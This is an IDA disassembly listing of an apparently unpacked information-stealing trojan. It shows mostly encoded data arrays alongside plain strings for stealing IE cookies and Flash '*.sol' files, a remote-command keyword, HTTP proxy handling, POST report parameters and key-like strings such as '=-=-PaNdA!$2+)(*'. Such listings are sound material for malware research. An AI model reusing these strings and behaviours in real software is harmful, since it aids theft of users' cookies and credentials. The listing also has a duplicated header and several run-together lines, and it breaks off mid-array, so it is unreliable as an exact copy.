;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : AB63641704B1CCC42634234419491731
; File Name : u:\work\ab63641704b1ccc42634234419491731_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C773 ( 51059.)
; Section size in file : 0000C773 ( 51059.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_401000 dd 99B483A5h, 5610D612h, 0E4351223h, 2C1A56FFh, 0
; DATA XREF: sub_40325F+4A�o
; sub_4070E1+22�o ...
a_txt: ; DATA XREF: sub_4033DA+8E�o
unicode 0, <.txt>,0
align 10h
aGrb: ; DATA XREF: sub_4033DA+5E�o
unicode 0, <grb>,0
dword_401028 dd 0FA11D300h, 499DECAh, 11AAFF0Fh, 12EFCDABh, 0 ; sub_40412F+1C�o ...
dword_40103C dd 2Ah ; sub_40A28B+B�o ...
dword_401040 dd 0BBB6A90Bh, 6C6FB2B0h, 9EA09A66h, 0 ; .data:0040F310�o ...
dword_401050 dd 0A7B7BB0Ah, 686E71B2h, 0A0A29Ch ; .data:0040F300�o ...
dword_40105C dd 0B0ADBD0Bh, 0AEA1ACA9h, 9EA09A66h, 0 ; .data:0040F2F0�o ...
dword_40106C dd 74B7BD0Ah, 686E719Fh, 0A0A29Ch ; .data:0040F2E0�o ...
dword_401078 dd 0B1B7BD0Bh, 6C6FA9A3h, 9EA09A66h, 0 ; .data:0040F2D0�o ...
dword_401088 dd 0A6B8B409h, 9E6AAAACh, 0A2A4h, 9A8A9612h, 0A9ACAB89h
; DATA XREF: sub_40A555+4E�o
; .data:off_40F2C0�o ...
dd 9777AAAAh, 9E7FA2A2h, 899897h, 0B6A98D10h, 0AAA5AA83h
dd 0A495A59Ah, 9E8D7294h, 89h, 0A7A9960Ch, 0ADA18BABh
dd 979B97ABh, 87h, 0A7A9960Ch, 0ADA18BABh, 979B97ABh, 71h
dd 0B6A98D0Bh, 0ADAFA38Dh, 73999D99h, 0
dword_4010EC dd 0B6A98D0Bh, 0ADAFA38Dh, 89999D99h, 0 ; .data:0040F224�o
dword_4010FC dd 83979D09h, 9EAAA393h, 0A58Ch, 83979D07h, 9EAAA393h
; DATA XREF: .text:00402FB8�o
; .data:0040F1E8�o ...
dd 0
dword_401114 dd 0B1B0A90Bh, 0A9AFA3B3h, 0A699A19Bh, 0 ; .text:00403040�o ...
dword_401124 dd 0B0A9B906h, 0ABB2A4h ; .text:00403038�o ...
dword_40112C dd 0B0A9B904h, 0A4h, 0B6B88E0Eh, 9FB18FB0h, 0A07DAFAAh
; DATA XREF: .text:off_402FA0�o
; .text:off_403030�o ...
dd 839D96h, 0B6B88E0Eh, 9FB18FB0h, 0A07DAFAAh, 6D9D96h
dd 0B6B28F13h, 9FAAB0A5h, 0A1A079ACh, 8B7493A3h, 87908A96h
dd 0
dword_40116C dd 0B6B28F1Ah, 9FAAB0A5h, 97A987ACh, 8B70A7A2h, 9865879Ch
; DATA XREF: .text:00402EA0�o
; .data:0040F0F8�o
dd 7B888781h, 79827Ah, 0B6B28F13h, 9FAAB0A5h, 939988ACh
dd 96957494h, 639C6B8Dh, 0
dword_4011A0 dd 0B6B28F13h, 9FAAB0A5h, 939988ACh, 96957494h, 799C6B8Dh
; DATA XREF: .text:00402EA8�o
; .data:0040F0D0�o
dd 0
dword_4011B8 dd 0B6B28F10h, 9FAAB0A5h, 939988ACh, 96957494h, 8Dh, 0B6B88E12h
; DATA XREF: .text:00402E50�o
; .data:0040F0BC�o
dd 0A8A191B0h, 0A399889Ch, 9E9F93A5h, 659E6Dh, 0B6B88E12h
dd 0A8A191B0h, 0A399889Ch, 9E9F93A5h, 7B9E6Dh, 0B6B88E10h
dd 0A8A191B0h, 0A399889Ch, 9E9F93A5h, 69h, 0B6B88E10h
dd 0A8A191B0h, 0A399889Ch, 9E9F93A5h, 7Fh, 93B89414h, 0B3AEA3B5h
dd 97A69F7Ch, 9C9BA293h, 8E8D6CA1h, 85h, 0B4A89216h, 8AB0A387h
dd 9797A5AAh, 8F9EA394h, 94888A69h, 8F9185h, 0B4A8920Ah
dd 9E9DAD8Ch, 0A0A27Ch, 85B8940Eh, 0AE9DA3B2h, 0A49C8A9Dh
dd 908F95h
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: sub_404222+3D�o
; .data:00415785�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_404222+28�o
; .data:00415770�o
align 4
asc_401288: ; DATA XREF: sub_40471E+45�o
; sub_40471E+88�o ...
unicode 0, < >,0
aUnknown: ; DATA XREF: sub_4048AF+6A�o
; sub_40AC72+FF�o ...
unicode 0, <unknown>,0
word_40129C dw 1Ch ; DATA XREF: sub_405127+49�r
; sub_41664D+49�r
dw 1Dh
dd 253D7325h, 0A73h ; DATA XREF: sub_404AAD+F0�o
; sub_415FD3+F0�o
dword_4012A8 dd 7461500Ah, 25203A68h, 0A73h ; sub_415FD3+B5�o
a_sol: ; DATA XREF: sub_404C11+14A�o
; sub_416137+14A�o
unicode 0, <*.sol>,0
aMacromediaFlas: ; DATA XREF: sub_404C11+131�o
; sub_416137+131�o
unicode 0, <Macromedia\Flash Player>,0
aIeCookies db 0Ah ; DATA XREF: sub_404D6D+339�o
; sub_416293+339�o
db 'IE Cookies:',0Ah,0
align 10h
dword_401300 dd 10FA10F7h, 6313120h, 0A2937288h, 20C6C5B5h, 0 ; sub_404D6D+3A1�o ...
dword_401314 dd 0A0Dh ; sub_407BDB+3C3�o ...
dword_401318 dd 304CE942h, 40D86E39h, 13B93A94h, 0D49C0CC4h ; sub_41766E+15�o
dword_401328 dd 0F7898AF5h, 4632CAC4h, 6DAECA2h, 0F21A11E5h ; sub_41766E+B�o
aPost db 'POST',0 ; DATA XREF: sub_4063D8+178�o
; sub_4178FE+178�o
align 10h
asc_401340: ; DATA XREF: sub_4063D8+FA�o
; sub_4178FE+FA�o
unicode 0, </>,0
aPanda2 db '=-=-PaNdA!$2+)(*',0 ; DATA XREF: sub_406F8C+8�o
; sub_406FA6+8�o ...
align 4
a@hj01n_1@ db '-!-@hj01N./1@};|',0 ; DATA XREF: sub_406FC4+8�o
; sub_406FDE+8�o ...
align 4
aId db '&id=',0 ; DATA XREF: sub_4072A7+5A�o
; .data:00418827�o
align 4
a3 db '3=',0 ; DATA XREF: sub_4072A7+29�o
; .data:004187F6�o
align 4
aRcmd db 'rcmd',0 ; DATA XREF: sub_407335+E�o
; .data:00418869�o
align 10h
dword_401380 dd 1D5BE4B5h, 452DFA4Ah, 0B35DDD9Ch, 0EBE70551h ; sub_418A96+42A�o
aConnectionClos db 'Connection: close',0Dh,0Ah ; DATA XREF: sub_407BDB+472�o
; .data:00419573�o
db 0Dh,0Ah,0
align 4
aHttp1_0200Conn db 'HTTP/1.0 200 Connection established',0Dh,0Ah
; DATA XREF: sub_407BDB+383�o
; .data:00419484�o
db 0Dh,0Ah,0
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_407BDB+20C�o
; sub_407BDB+40C�o ...
align 4
aHost db 'Host: ',0 ; DATA XREF: sub_407BDB+1D7�o
; .data:004192D8�o
align 4
aProxy db 'Proxy-',0 ; DATA XREF: sub_407BDB+1B4�o
; .data:004192B5�o
align 4
aKeepAlive db '*keep-alive*',0 ; DATA XREF: sub_407BDB+199�o
; .data:0041929A�o
align 4
aConnection db 'Connection: ',0 ; DATA XREF: sub_407BDB+17E�o
; .data:0041927F�o
align 4
aProxyConnectio db 'Proxy-Connection: ',0 ; DATA XREF: sub_407BDB+15D�o
; .data:0041925E�o
align 4
aHttp db 'http://',0 ; DATA XREF: sub_407BDB+AC�o
; .data:004191AD�o
aConnect db 'CONNECT ',0 ; DATA XREF: sub_407BDB+69�o
; .data:0041916A�o
align 4
aPr db '&pr=',0 ; DATA XREF: sub_4089D8+191�o
; .data:0041A08F�o
align 4
aLcp db '&lcp=',0 ; DATA XREF: sub_4089D8+15B�o
; .data:0041A059�o
align 4
aSp db '&sp=',0 ; DATA XREF: sub_4089D8+122�o
; .data:0041A020�o
align 4
aS db '&s=',0 ; DATA XREF: sub_4089D8+FB�o
; sub_40BAC3+13A�o ...
aI db '&i=',0 ; DATA XREF: sub_4089D8+B7�o
; sub_40BAC3+F8�o ...
aV db '&v=',0 ; DATA XREF: sub_4089D8+86�o
; .data:00419F84�o
aN db '&n=',0 ; DATA XREF: sub_4089D8+74�o
; .data:00419F72�o
a2 db '2=',0 ; DATA XREF: sub_4089D8+43�o
; .data:00419F41�o
align 4
dword_401468 dd 45ACFF02h, 3356100Bh, 1189642h, 7866A3F1h, 0 ; .data:0041A0EB�o
aScript db 'script',0 ; DATA XREF: .text:00403160�o
; sub_409123+71�o ...
align 4
aTd db 'td',0 ; DATA XREF: .text:00403154�o
align 4
aTr db 'tr',0 ; DATA XREF: .text:00403150�o
align 4
aHr db 'hr',0 ; DATA XREF: .text:0040314C�o
align 10h
aBr db 'br',0 ; DATA XREF: .text:off_403148�o
align 4
dword_401494 dd 9A8A9612h, 0A9ACB685h, 9777AAAAh, 9E7FA2A2h, 899897h
; DATA XREF: .text:00403138�o
dd 0B4A9891Fh, 0AAB182B4h, 93979FA4h, 8F6F93A4h, 888D9A9Ah
dd 8E7D8189h, 8083597Dh, 7E847384h, 0
dword_4014CC dd 0B4A9891Eh, 0A6A182B4h, 7599AA9Dh, 93A0A095h, 83878F8Eh
; DATA XREF: .text:00403128�o
dd 8C628394h, 86678387h, 71807Fh, 0B4A9891Bh, 0AFAA83B4h
dd 0A49979A5h, 939297A4h, 8798878Bh, 6D8A6793h, 7786858Ch
dd 0
dword_40150C dd 0B4A9890Eh, 0A9A881B4h, 0A6879BABh, 91A09Fh dd 0B4A98914h, 9FAC8DB4h, 0A5AD89A6h, 7D9993A4h, 8796959Ch
; DATA XREF: .text:off_403110�o
dd 77h
dword_401534 dd 85B38910h, 0AE9DA3B2h, 0A5A27F9Dh, 8D9A8FA4h, 8Dh, 0B6A98D0Bh
; DATA XREF: .text:off_403108�o
dd 0A8ABA189h, 0A19AA481h, 0
dword_401558 dd 0A3B68A08h, 0A99F87B7h, 0A6h, 0B6A98D0Ch, 0ADAEB383h
; DATA XREF: .text:004030F8�o
; .text:004030F0�o
dd 0A184A8A7h, 0A3h, 0A3B3920Bh, 0ACB181A4h, 89A6A5ABh
dd 0
dword_401584 dd 0B6A99910h, 9FAEA694h, 97789A99h, 99A099A3h, 98h, 0B1B0890Ch
; DATA XREF: .text:004030E0�o
dd 9F80A3B3h, 0A1A8A1ABh, 0A0h, 0A7B4950Ch, 0ADA182AEh
dd 0A2A3AAA3h, 71h, 0B6A99917h, 9DABB090h, 89A7A99Dh, 99909C99h
dd 8398799Fh, 888B8794h, 0
dword_4015D4 dd 0B1B08912h, 0A393A3B3h, 0A9A39AA6h, 9E8DA283h, 929591h
; DATA XREF: .text:004030C0�o
dd 0A7B49512h, 0A8A595AEh, 85ABA59Ch, 93A08FA4h, 659497h
dd 0B6A98D13h, 9FAEAD86h, 0A7A3A89Fh, 9383929Eh, 99938A96h
dd 0
dword_401614 dd 0B6A98D18h, 9EAAA797h, 9A88ADA7h, 8E8D93A2h, 85939878h
; DATA XREF: .text:004030A8�o
dd 638F9185h, 7Ch, 0B5AD8A10h, 9DB09FB0h, 0A59983A0h, 8F938FA3h
dd 7Fh, 0A9B79319h, 0AEA59F97h, 7FA6A57Eh, 93A09AA5h, 71899298h
dd 7D818882h, 898Ch, 0B6A98D10h, 9CB5A38Bh, 96A697A7h
dd 9E8DA283h, 8Dh, 97B39A09h, 0A99FA7AEh, 9B9Ch, 0B6A98D0Bh
dd 8DB5A38Bh, 97A897ACh, 0
dword_401690 dd 0A3AC890Eh, 0B1AB8AB2h, 0A776A89Dh, 6D9496hdword_4016A0 dd 0ABBC8B0Dh, 0A8A595B4h, 0A5ABA59Ch, 0A675h, 0B6A9AD0Dh
; DATA XREF: .text:off_403048�o
dd 0AEAFADA8h, 93A2AF9Ah, 939Dh, 0A7B2AF09h, 9E9D9DB4h
dd 0A89Ch, 0B0B3A907h, 0AE9FA3AEh, 0
dword_4016D8 dd 0AEA9B906h, 0B0A1A5h, 83979D08h, 0AE9FAD89h, 0A4h, 0A5A9B804h
; DATA XREF: .text:00403010�o
; .text:00403008�o
dd 0B6h, 0B7ACB908h, 0B1ABA2B4h, 0A6h, 83979D0Ah, 0AC9DB293h
dd 0A4ABACh, 0A5A7A706h, 0B0AEA5h, 0B5ADB206h, 0AAA3B4h
dd 0B0ADA804h, 0A4h, 0A5B3B906h, 0B0A3ABh, 0B6A9AD0Bh
dd 0ACA1A3B0h, 97A197A6h, 0
dword_40173C dd 0BBB68913h, 9F8EB2B0h, 0A5959BA4h, 989B7195h, 969C8B9Ch
; DATA XREF: .text:00402F98�o
dd 0
dword_401754 dd 0BBB68910h, 9F80B2B0h, 0A1A6AAABh, 9D8D76A9h, 90h, 0BBB68911h
; DATA XREF: .text:00402F90�o
dd 9F83B2B0h, 0A5957EACh, 9C8D7E98h, 9389h, 0BBB6890Dh
dd 9B84B2B0h, 93789EABh, 8FA4h, 0BBB6890Fh, 0AC7FB2B0h
dd 97A8979Dh, 929F8F78h, 0
dword_4017A0 dd 0BBB68914h, 9D7DB2B0h, 0A49DABA9h, 989B7195h, 969C8B9Ch
; DATA XREF: .text:00402F70�o
dd 77h, 0B2B98A10h, 9B9FA7ACh, 0A1889BACh, 6F9A939Bh, 0A0h
dd 0A7B68914h, 8AA1B2A1h, 9797A5AAh, 9D6DA1A3h, 9489997Dh
dd 77h, 0B6A99919h, 0AF9FA393h, 0ABA89FAAh, 8D9F9374h
dd 96948F9Ah, 7B60908Fh, 827Bh, 0ABB28F1Ch, 0A69DA7B4h
dd 8599B0A1h, 9CA19195h, 669D9A91h, 8C7F9185h, 81888681h
dd 82h, 0A9A9980Dh, 0A7B1AC85h, 77AD9B83h, 85A8h, 0A9A9980Fh
dd 9FA8A384h, 938A9BACh, 8191A39Ch, 0
dword_401844 dd 0A9A9980Eh, 90B0A393h, 97A9A299h, 83A675h, 0A9A9980Bh
; DATA XREF: .text:00402F38�o
dd 0ADABAA83h, 0AB99819Dh, 0
dword_401864 dd 0A9A9980Fh, 9BA1B083h, 977F9BACh, 81A473A9h, 0
; DATA XREF: .text:00402F28�o
dword_401878 dd 0A9A99810h, 0ACA1B391h, 9E958CB1h, 0A27193A5h, 7Fh
; DATA XREF: .text:00402F20�o
dd 0B1B39211h, 7BACB3ABh, 0A7A3999Bh, 937FA29Eh, 7D8Ch
dd 0B6A98D13h, 9FA7AD94h, 98A27FA6h, 8B99A09Fh, 90938F9Ch
dd 0
dword_4018B8 dd 0A7B49510h, 0A9AE8EAEh, 0A5A79B9Bh, 8F979D84h, 96h
; DATA XREF: .text:00402F08�o
dd 0ACA88715h, 8EB0B1B5h, 0A099A1A7h, 0A095A080h, 89899291h
dd 9185h, 0B1B39215h, 8AACB3ABh, 9BAA9FAAh, 8F93939Ch
dd 9790877Eh, 7585h
dword_4018FC dd 0B6A98D0Ch, 0ACA1B195h, 97A19786h, 87h, 0AEA98A14h
; DATA XREF: .text:off_402EF0�o
dd 8FA1B2A5h, 9377A2AAh, 6F919693h, 9B969A96h, 77h, 0B0AD8C11h
dd 0A9A881A4h, 0A4899BABh, 8D8D719Ch, 8B90h, 0B0AD8C16h
dd 0B2A18CA4h, 9EA68BACh, 928F8F73h, 96926B8Dh, 739792h
dd 0B0AD8C17h, 0ACA584A4h, 0A489AAABh, 8D8D719Ch, 90698B90h
dd 71959094h, 0
dword_40196C dd 0B6B28F12h, 9FAAB0A5h, 0A69989ACh, 93A09E7Fh, 659497h
; DATA XREF: .text:00402EC0�o
dd 0B6B28F19h, 9FAAB0A5h, 0A69989ACh, 9E8DA283h, 8367999Dh
dd 7B7E8A8Ch, 817Bh, 0B6B88E16h, 9EA07FB0h, 0A7A59B8Ah
dd 72A0A195h, 8788878Dh, 5D9192h, 0B6B88E16h, 9EA07FB0h
dd 0A7A59B8Ah, 72A0A195h, 8788878Dh, 739192h, 0B6B28F14h
dd 9FAAB0A5h, 97A987ACh, 9A7BA7A2h, 90938F9Ch, 61h, 0B6B28F18h
dd 9FAAB0A5h, 979C79ACh, 996F9993h, 85899496h, 888B8794h
dd 59h, 0B6B28F11h, 9FAAB0A5h, 93A679ACh, 9C819993h, 6794h
dd 0B6B88E10h, 9FAC8DB0h, 0A39988A6h, 9E9F93A5h, 69h, 0B6B28F10h
dd 9FAAB0A5h, 0A0A379ACh, 9E8F939Eh, 69h, 0B6B28F10h, 9FAAB0A5h
dd 97A485ACh, 969E839Eh, 69h
dword_401A50 dd 0B6B28F0Dh, 9FAAB0A5h, 97A485ACh, 6F9Ehdword_401A60 dd 0B6A98D14h, 0AFA0AD8Dh, 9B7A9BA4h, 8B7A939Ch, 9A698B95h
; DATA XREF: .text:off_402E18�o
dd 77h, 868C990Ch, 0AEA1AAA5h, 0AB99819Dh, 71h, 0B6A5960Eh
dd 0AE9D8BA8h, 0A2879E9Bh, 839195h, 0B6A59613h, 0A7A190A8h
dd 7899ACA7h, 7D919A99h, 79878B98h, 0
dword_401AB0 dd 0B6A5960Fh, 0A6A584A8h, 9BAC7B9Dh, 819FA2A3h, 0
; DATA XREF: .text:00402DF8�o
dword_401AC4 dd 0B6A59611h, 0A8A584A8h, 9E9D7C9Ch, 978D7C95h, 7D8Dh
; DATA XREF: .text:00402DF0�o
dd 0B6A5960Ch, 0A7AB81A8h, 97A29F9Ah, 87h, 0B5B2BD0Ah
dd 0A8A5B0B0h, 759CACh, 0B5B2BD0Ah, 0A8A5B0B0h, 8B9CACh
dd 0B0BABD0Bh, 0A3AEAEB3h, 739AAAA6h, 0
dword_401B10 dd 0B0BABD0Bh, 0A3AEAEB3h, 899AAAA6h, 0dword_401B20 dd 0B4B89909h, 88ACAB83h, 8D81h, 0B4B89909h, 88ACAB83h
; DATA XREF: .text:00402DC0�o
; .text:00402DB8�o
dd 7781h
dd 0B4B89907h, 91AEB293h, 0 ; DATA XREF: .text:off_402DB0�o
dword_401B44 dd 0B4A8920Fh, 7EB0A387h, 937CA2A4h, 8F98929Eh, 0
; DATA XREF: .text:00402DA0�o
dword_401B58 dd 93B89419h, 0B3AEA3B5h, 0A19AA481h, 9E8D9BA2h, 72929591h
; DATA XREF: .text:00402D88�o
dd 7F7F8D92h, 898Bh
dword_401B74 dd 93B8940Dh, 0B3AEA3B5h, 979E9887h, 0A293h dd 898C9917h, 0AA8FB2A5h, 939D999Dh, 969B749Ch, 72968B8Ch
; DATA XREF: .text:off_402D70�o
dd 71849281h, 0
dword_401BA0 dd 0B2BC8B19h, 7FA0ACA1h, 0A49DACA6h, 8F999C9Fh, 96779A96h
; DATA XREF: .text:00402D68�o
dd 818A8792h, 6D8Bh, 0B1B08D0Ch, 8FA89FA2h, 95A3A2A6h
dd 9Bh, 0B1B08D0Ah, 86A89FA2h, 9F99A7h, 0B6A98D0Bh, 9FA8A786h
dd 97A19F8Ch, 0
dword_401BE8 dd 0B6A9990Bh, 9FA8A786h, 97A19F8Ch, 0dword_401BF8 dd 0B6A98D10h, 0AAA9AD83h, 0A499AAADh, 8F998F7Eh, 7Fh
; DATA XREF: .text:00402D40�o
dd 0B0AD8C09h, 0A9A881A4h, 9BABh, 0B0AD8C0Dh, 0B2A18CA4h
dd 9E9D7CACh, 8595h, 0B0AD8C0Eh, 0ACA584A4h, 9B7AAAABh
dd 83939Ch, 0B6A98D10h, 0AAA9A394h, 97A09F7Eh, 8F998F7Eh
dd 7Fh, 0B6A98D0Dh, 0AEAFB793h, 9B88A39Dh, 939Dh, 0A3A99214h
dd 0AC7FA3B6h, 959DAAA1h, 8F7F9A91h, 918D9A8Bh, 8Eh, 0B6B28B14h
dd 0AC7FB0A5h, 959DAAA1h, 8F7F9A91h, 918D9A8Bh, 8Eh, 0ABB28F19h
dd 0A69DA7B4h, 7599B0A1h, 93A097A2h, 7590878Bh, 83908185h
dd 8487h, 0A3A99811h, 0A9AE8EA4h, 0A5A79B9Bh, 9999937Dh
dd 9F9Ah, 0B6A9990Ch, 0AEAF9F8Ch, 0A1A6A87Dh, 0A2h, 84B78F0Ch
dd 9F8EA2A1h, 0A6849A99h, 0A2h, 0B6A98D0Ch, 0AAA9A394h
dd 9AA89788h, 87h, 0A7B68910h, 7EA1B2A1h, 9599A8A1h, 0A39E9DA4h
dd 7Fh, 0B8B3930Bh, 0A6A584A5h, 89AC7B9Dh, 0
dword_401D10 dd 0A6AD9D13h, 9BA481A5h, 7FA38AAAh, 93A09AA5h, 87989F6Ah
; DATA XREF: .text:00402CC8�o
dd 0
dword_401D28 dd 0AEB99313h, 0B37EA7B4h, 0A1889BACh, 8F909787h, 94858E6Bh
; DATA XREF: .text:00402CC0�o
dd 0
dword_401D40 dd 0B6A98D0Fh, 9DABB090h, 86A7A99Dh, 9D919B99h, 0
; DATA XREF: .text:00402CB8�o
dword_401D54 dd 0A7B6890Eh, 8AA1B2A1h, 9797A5AAh, 83A1A3h, 0B6A98D12h
; DATA XREF: .text:00402CB0�o
dd 0ACAEB383h, 86A8A49Dh, 8B91A098h, 886F8Ch, 0B6A98D10h
dd 0ACAEB383h, 86A8A49Dh, 8B91A098h, 8Ch, 0B6A98D11h, 9FAEA694h
dd 0A4849A99h, 939E9D99h, 9F9Ch, 0B6A99911h, 9FAEA694h
dd 0A4849A99h, 939E9D99h, 9F9Ch, 0B6A98D13h, 0ACAEB383h
dd 82A8A49Dh, 8F8F9DA2h, 866D999Bh, 0
dword_401DCC dd 0B4AD9C10h, 0A69DB3B4h, 0A6A3A888h, 6FA09195h, 0A0h
; DATA XREF: .text:00402C80�o
dd 0B4AD9C0Eh, 0A69DB3B4h, 0A1A0A279h, 0A47393h, 0B4AD9C0Eh
dd 0A69DB3B4h, 0A499AB89h, 0A473A9h, 0A7B4950Bh, 0A9AE8EAEh
dd 0A5A79B9Bh, 0
dword_401E10 dd 0B6A98D12h, 0AEA5B685h, 9798A57Bh, 8D9BA080h, 97998Dh
; DATA XREF: .text:00402C60�o
dd 0B4AC9A0Ch, 6DA09FA5h, 0AA99846Ah, 0A4h, 0B4AC9A0Dh
dd 6DA09FA5h, 0A49D7C6Ah, 0A2A3h, 0A6B3930Dh, 6DA1AAB5h
dd 0AA99846Ah, 85A4h, 0A6B3930Eh, 6DA1AAB5h, 0A49D7C6Ah
dd 83A2A3h, 0B1B6960Eh, 0ADAFA3A3h, 9782686Bh, 83A2A8h
dd 0B1B6960Fh, 0ADAFA3A3h, 9B7A686Bh, 81A0A1A2h, 0
dword_401E88 dd 0A7B68918h, 8EA1B2A1h, 9AA0A5A7h, 5D9C9A95h, 8392795Ah
; DATA XREF: .text:00402C28�o
dd 89849190h, 8Ch, 0A7B6890Ch, 8EA1B2A1h, 9399A8A0h, 94h
dd 0ABB69D12h, 0AC8CA3B4h, 0A59999A7h, 97917BA3h, 9D9897h
dd 0B5AD8A13h, 0A8AAADA3h, 80A8999Dh, 8E919B91h, 87948F78h
dd 0
dword_401EE0 dd 0B6A98D0Ch, 9B9FAD8Ch, 9F9D8AA4h, 95h, 0B7B08C10h, 0A382A6B3h
; DATA XREF: .text:00402C08�o
dd 0A7769BA4h, 9C919496h, 9Bh, 0B6A98D0Bh, 9FA8A786h, 97AE9F8Bh
dd 0
dword_401F14 dd 0B6A9990Ch, 89A0AC85h, 9E9D7C9Eh, 95h, 0A3A99808h, 0A6A584A4h
; DATA XREF: .text:00402BF0�o
dd 9Dh, 0ABB69D09h, 0A382A3B4h, 9BA4h, 0A7B68912h, 8CA1B2A1h
dd 0A6A3A39Dh, 9C948295h, 88878Dh, 0B6A98D0Ch, 0A59FA794h
dd 0A0A9A57Bh, 0A4h, 0A7B68910h, 88A1B2A1h, 9699A399h
dd 8F9C9780h, 7Fh, 0B6A99917h, 9FA99F8Eh, 0A29D869Ch, 988D7695h
dd 7589928Ch, 7F907F94h, 0
dword_401F90 dd 0ABA59D0Eh, 0A79D8CB4h, 9B849A9Dh, 8393A0h, 0B0B38910h
; DATA XREF: .text:00402BB8�o
dd 0AE9FA3AEh, 97A19786h, 9A957E94h, 8Dh, 0A3A98E08h, 9FAE84B0h
dd 9Dh, 0A3A98E0Bh, 7BA190B0h, 95A3A2A4h, 0
dword_401FD0 dd 0A3A98E09h, 0A6A87FB0h, 99A7h, 0B6A9990Eh, 9FA8A786h
; DATA XREF: .text:00402B98�o
; .text:00402B90�o
dd 0A09DA588h, 9E93A4h, 0A7B6890Ch, 7FA1B2A1h, 0A6A29BAEh
dd 87h, 0A7B6890Bh, 80A1B2A1h, 8999A2A1h, 0
dword_40200C dd 0B6A99908h, 0A8A1B485h, 0ACh, 0ABA59D13h, 0ACAB84B4h
; DATA XREF: .text:00402B78�o
; .text:00402B70�o
dd 99A29F8Bh, 8C7B939Ch, 96878B92h, 0
dword_402030 dd 0B6A99912h, 9FA8A786h, 0A4A8AA79h, 9EA19099h, 7B998Dh
; DATA XREF: .text:00402B68�o
dd 0AEA98A0Bh, 80A1B2A5h, 8999A2A1h, 0
dword_402054 dd 0B1B0890Bh, 9B84A3B3h, 97A09AA6h, 0dword_402064 dd 0B6B7B208h, 0AE9DA1B2h, 79h, 0B6B7B208h, 0AE9DA1B2h
; DATA XREF: .text:00402B50�o
; .text:00402B48�o
dd 8Fh, 0B6B7B208h, 0B3ACA1B2h, 79h, 0B6B7B209h, 0B3ACA1B2h
dd 8DA6h, 0B6B7B208h, 0B3ACA1B2h, 8Fh, 0B6B7B208h, 0A8A1AAB2h
dd 79h, 0B6B7B208h, 0A8A1AAB2h, 8Fh, 0B6B7B209h, 0AAA9A1B2h
dd 77A1h, 0B6B7B209h, 0AAA9A1B2h, 8DA1h, 0AEA9980Ch, 9FAF9FA5h
dd 97A8AB85h, 0A8h, 0A7B4950Ah, 0AEB18BAEh, 8BAE9Dh, 0A7B6890Ch
dd 87A1B2A1h, 0AA99AAADh, 87h, 0B6A98D0Ch, 0AEAF9F8Ch
dd 0A1A6A87Dh, 0A2h, 0B6A98D12h, 0AFA0AD8Dh, 9B7A9BA4h
dd 8B7A939Ch, 658B95h, 0B6A98D12h, 0AFA0AD8Dh, 9B7A9BA4h
dd 8B7A939Ch, 7B8B95h, 0B2B38909h, 0A6A584B9h, 8D9Dh, 0A7B09905h
dd 0AEA5h, 0B6A98D10h, 0AFA0AD8Dh, 937C9BA4h, 8F98929Eh
dd 69h, 0B6A98D0Eh, 9DABB090h, 7AA7A99Dh, 9C8F95h, 0B6A98D18h
dd 0ACA1B195h, 939A9B7Ch, 7FA09AA5h, 90857271h, 817D9387h
dd 7Dh, 0B6A98D0Dh, 0ADAEA396h, 77A2A5A1h, 85A8h, 0B6A98D16h
dd 9FA9A794h, 97A2A592h, 99929C79h, 9685939Ah, 8A8D89h
dd 0B5A9980Ah, 0B081B2A5h, 0A8A49Dh, 0AFB29B0Fh, 0A392AEA1h
dd 9883AD9Dh, 8F989776h, 0
dword_4021D0 dd 0B2A5930Dh, 0B1A1A796h, 9B7A9C87h, 939Ch, 0A7B68912h
; DATA XREF: .text:00402A90�o
dd 80A1B2A1h, 7F99A2A1h, 939C9E91h, 7B8D96h, 0B6A98D0Dh
dd 9FA8A786h, 97AE9F8Bh, 0A675h, 0B6A98D0Dh, 0B0A5B084h
dd 0A2AD8A9Dh, 8595h, 0B6A98D10h, 0A3A3AD8Ch, 76A0979Bh
dd 8FA297A2h, 9Bh
dword_402228 dd 0B6A98D0Fh, 0A7A9AD83h, 7E98A499h, 6B919C99h, 0
; DATA XREF: .text:off_402A68�o
dword_40223C dd 8D97870Eh, 7F8C8E89h, 7388567Ch, 4C687Eh, 948B870Eh
; DATA XREF: .data:0040F5C0�o
dd 7F7E8081h, 7388567Ch, 4C687Eh, 0A7A79D1Ch, 96AFB2B2h
dd 5793A95Dh, 89A16060h, 9756564Dh, 4E4C437Fh, 7884448Dh
dd 88h, 9B919D03h, 0
dword_402284 dd 0A3B49D05h, 0B1B3h, 0ABAA9D13h, 9FAFA3ACh, 9A97A899h
; DATA XREF: .data:0040F5B0�o
; .data:0040F5AC�o
dd 605C538Ch, 95498580h, 0
dword_4022A4 dd 0B1B79D3Ch, 9BB3B2A6h, 9F909BAAh, 999E9199h, 968A959Bh
; DATA XREF: .data:0040F5A8�o
dd 8885957Ch, 858B857Ch, 7C81716Ch, 76726B7Ah, 6D6E6376h
dd 4E626561h, 565C6655h, 54495857h, 474B413Ch, 53B423Ch
dd 2, 0A7A88706h, 0A2B1ACh, 0A6A58706h, 0A2B1A4h, 0A7AB8708h
dd 0A6A5A4B4h, 9Dh, 706E9D05h, 0A4B5h, 72699D08h, 0AF6A9678h
dd 9Eh, 0B48B871Ah, 9F9EA0A1h, 9398569Ch, 904C8FA4h, 5C91959Ah
dd 248F4340h, 873B22h, 0A5858712h, 0AEACA3A3h, 95A27B65h
